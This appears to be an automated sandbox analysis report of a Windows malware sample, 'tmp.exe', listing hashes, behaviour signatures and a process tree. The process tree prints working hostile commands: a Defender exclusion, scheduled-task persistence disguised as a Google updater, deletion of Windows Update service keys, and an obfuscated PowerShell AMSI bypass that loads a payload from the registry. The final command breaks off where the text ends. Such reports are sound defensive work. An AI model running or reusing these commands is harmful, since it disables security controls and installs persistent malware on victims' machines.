Analysis
-
max time kernel
23s -
max time network
30s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2022, 07:06
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20220901-en
General
-
Target
tmp.exe
-
Size
3.7MB
-
MD5
35dbf36cc33d84930bac9d66a141af05
-
SHA1
11e41f289355a99f812f400247632403feabd494
-
SHA256
40ef7d8a6123e7842889f15406677fabf2534c5680f3c0df2c0087b7fe14ec63
-
SHA512
d16cf2f1f29c6f5c838c08f055e39d2b54639ffd18b3d7dff950fc55a06c9ec495c2272456072ab014f7b81671b6ae66a89a73ccab3f78b4757f4e9129fb7fb5
-
SSDEEP
98304:AJlcIHDP4vYrKkLBbpPAHeoqFnIBMzwNCX:+lzjP8YTBbpPA+CBbN
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 2564 created 980 2564 tmp.exe 19 PID 2564 created 980 2564 tmp.exe 19 PID 2564 created 980 2564 tmp.exe 19 PID 2564 created 980 2564 tmp.exe 19 PID 2564 created 980 2564 tmp.exe 19 PID 2564 created 980 2564 tmp.exe 19 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts tmp.exe -
Stops running service(s) 3 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2564 set thread context of 2264 2564 tmp.exe 102 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe tmp.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3200 sc.exe 3900 sc.exe 3172 sc.exe 3964 sc.exe 1272 sc.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 2564 tmp.exe 2564 tmp.exe 992 powershell.exe 992 powershell.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 3220 powershell.exe 3220 powershell.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 2564 tmp.exe 3276 powershell.exe 3276 powershell.exe 4612 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeShutdownPrivilege 2804 powercfg.exe Token: SeCreatePagefilePrivilege 2804 powercfg.exe Token: SeShutdownPrivilege 1276 powercfg.exe Token: SeCreatePagefilePrivilege 1276 powercfg.exe Token: SeShutdownPrivilege 4036 powercfg.exe Token: SeCreatePagefilePrivilege 4036 powercfg.exe Token: SeShutdownPrivilege 4048 powercfg.exe Token: SeCreatePagefilePrivilege 4048 powercfg.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeSystemEnvironmentPrivilege 3220 powershell.exe Token: SeRemoteShutdownPrivilege 3220 powershell.exe Token: SeUndockPrivilege 3220 powershell.exe Token: SeManageVolumePrivilege 3220 powershell.exe Token: 33 3220 powershell.exe Token: 34 3220 powershell.exe Token: 35 3220 powershell.exe Token: 36 3220 powershell.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeSystemEnvironmentPrivilege 3220 powershell.exe Token: SeRemoteShutdownPrivilege 3220 powershell.exe Token: SeUndockPrivilege 3220 powershell.exe Token: SeManageVolumePrivilege 3220 powershell.exe Token: 33 3220 powershell.exe Token: 34 3220 powershell.exe Token: 35 3220 powershell.exe Token: 36 3220 powershell.exe Token: SeIncreaseQuotaPrivilege 3220 powershell.exe Token: SeSecurityPrivilege 3220 powershell.exe Token: SeTakeOwnershipPrivilege 3220 powershell.exe Token: SeLoadDriverPrivilege 3220 powershell.exe Token: SeSystemProfilePrivilege 3220 powershell.exe Token: SeSystemtimePrivilege 3220 powershell.exe Token: SeProfSingleProcessPrivilege 3220 powershell.exe Token: SeIncBasePriorityPrivilege 3220 powershell.exe Token: SeCreatePagefilePrivilege 3220 powershell.exe Token: SeBackupPrivilege 3220 powershell.exe Token: SeRestorePrivilege 3220 powershell.exe Token: SeShutdownPrivilege 3220 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2164 wrote to memory of 3200 2164 cmd.exe 88 PID 2164 wrote to memory of 3200 2164 cmd.exe 88 PID 2460 wrote to memory of 2804 2460 cmd.exe 89 PID 2460 wrote to memory of 2804 2460 cmd.exe 89 PID 2164 wrote to memory of 3900 2164 cmd.exe 90 PID 2164 wrote to memory of 3900 2164 cmd.exe 90 PID 2460 wrote to memory of 1276 2460 cmd.exe 91 PID 2460 wrote to memory of 1276 2460 cmd.exe 91 PID 2164 wrote to memory of 3172 2164 cmd.exe 92 PID 2164 wrote to memory of 3172 2164 cmd.exe 92 PID 2460 wrote to memory of 4036 2460 cmd.exe 93 PID 2460 wrote to memory of 4036 2460 cmd.exe 93 PID 2164 wrote to memory of 3964 2164 cmd.exe 94 PID 2164 wrote to memory of 3964 2164 cmd.exe 94 PID 2460 wrote to memory of 4048 2460 cmd.exe 95 PID 2460 wrote to memory of 4048 2460 cmd.exe 95 PID 2164 wrote to memory of 1272 2164 cmd.exe 96 PID 2164 wrote to memory of 1272 2164 cmd.exe 96 PID 2164 wrote to memory of 1416 2164 cmd.exe 97 PID 2164 wrote to memory of 1416 2164 cmd.exe 97 PID 2164 wrote to memory of 2672 2164 cmd.exe 98 PID 2164 wrote to memory of 2672 2164 cmd.exe 98 PID 2164 wrote to memory of 2652 2164 cmd.exe 99 PID 2164 wrote to memory of 2652 2164 cmd.exe 99 PID 2164 wrote to memory of 4564 2164 cmd.exe 100 PID 2164 wrote to memory of 4564 2164 cmd.exe 100 PID 2164 wrote to memory of 5072 2164 cmd.exe 101 PID 2164 wrote to memory of 5072 2164 cmd.exe 101 PID 2564 wrote to memory of 2264 2564 tmp.exe 102 PID 3276 wrote to memory of 1456 3276 powershell.exe 109 PID 3276 wrote to memory of 1456 3276 powershell.exe 109
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#aiwmbiup#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3200
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3900
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3172
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3964
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1272
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1416
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2672
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2652
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4564
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:5072
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pavnoof#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:uHWZGivNdbfg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qgNWNnoPcBDfqq,[Parameter(Position=1)][Type]$EUPWWbfrCe)$BjSTNsQdAHU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+'c'+'te'+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+'od'+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'eT'+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+[Char](108)+'ass',[MulticastDelegate]);$BjSTNsQdAHU.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$qgNWNnoPcBDfqq).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$BjSTNsQdAHU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'S'+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,V'+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+'l'+'',$EUPWWbfrCe,$qgNWNnoPcBDfqq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'nag'+[Char](101)+'d');Write-Output $BjSTNsQdAHU.CreateType();}$gfUWYheCoGJam=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'eg'+'f'+''+'U'+''+'W'+''+[Char](89)+''+'h'+'eC'+[Char](111)+'G'+[Char](74)+''+[Char](97)+''+[Char](109)+'');$SyyKIEvEmEelXH=$gfUWYheCoGJam.GetMethod(''+[Char](83)+'y'+'y'+''+[Char](75)+''+[Char](73)+''+[Char](69)+''+[Char](118)+''+[Char](69)+''+[Char](109)+''+[Char](69)+''+[Char](101)+''+[Char](108)+''+'X'+''+[Char](72)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zmEgbFuRBooeHwQBCQD=uHWZGivNdbfg @([String])([IntPtr]);$xfZWAwHNwscrgAzetXdUyQ=uHWZGivNdbfg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xUEupmaiusY=$gfUWYheCoGJam.GetMethod(''+'G'+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'rn'+[Char](101)+'l'+[Char](51)+'2'+'.'+'d'+[Char](108)+'l')));$aireQOTYHtNMpd=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$xUEupmaiusY,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+[Char](97)+'r'+[Char](121)+'A')));$IdiHKEJAZRwQpmfEi=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$xUEupmaiusY,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$MGSwPGI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aireQOTYHtNMpd,$zmEgbFuRBooeHwQBCQD).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$yaLawzPwQgNQdxRWI=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$MGSwPGI,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+'r')));$ysmZmRAlFR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IdiHKEJAZRwQpmfEi,$xfZWAwHNwscrgAzetXdUyQ).Invoke($yaLawzPwQgNQdxRWI,[uint32]8,4,[ref]$ysmZmRAlFR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yaLawzPwQgNQdxRWI,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IdiHKEJAZRwQpmfEi,$xfZWAwHNwscrgAzetXdUyQ).Invoke($yaLawzPwQgNQdxRWI,[uint32]8,0x20,[ref]$ysmZmRAlFR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+'E').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+'s'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)1⤵PID:4404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sxAlHkGsEkrW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PVfdBqcjETvkRA,[Parameter(Position=1)][Type]$MDqhJTadsk)$XLucTNvhpHO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'Del'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+'d'+''+','+''+'A'+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XLucTNvhpHO.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PVfdBqcjETvkRA).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$XLucTNvhpHO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+''+'o'+'t,Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MDqhJTadsk,$PVfdBqcjETvkRA).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $XLucTNvhpHO.CreateType();}$CBFCPAwfjGmvy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 